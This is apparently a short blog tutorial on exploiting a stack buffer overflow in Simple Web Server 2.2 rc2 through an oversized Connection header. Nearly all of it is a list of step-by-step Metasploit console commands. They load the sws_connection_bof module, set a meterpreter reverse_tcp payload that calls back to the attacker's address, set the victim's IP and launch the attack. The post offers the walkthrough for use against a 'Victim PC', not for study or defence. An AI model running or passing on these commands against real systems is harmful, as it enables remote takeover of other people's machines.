This module exploits vulnerability in Simple Web Server 2.2 rc2. A remote user can send a long string data in the Connection Header to causes an overflow on the stack when function vsprintf () is used, and gain arbitrary code execution. The module has been tested successfully on Windows 7 SP1 and Windows XP SP3...
Exploit Targets
Simple Web Server 2.2-rc2
Windows XP SP2
Windows 7
Requirement
Attacker: Backtrack 5
Victim PC: Windows 7
Open backtrack terminal type msfconsole
Now type use exploit/windows/http/sws_connection_bof
msf exploit(sws_connection_bof) > set payload windows/meterpreter/reverse_tcp
msf exploit(sws_connection_bof) > set lhost 192.168.1.4 [IP of Local Host]
msf exploit(sws_connection_bof) > set rhost 192.168.1.9 [IP of Victim PC]
msf exploit(sws_connection_bof) > exploit
0 komentar:
Speak up your mind
Tell us what you're thinking... !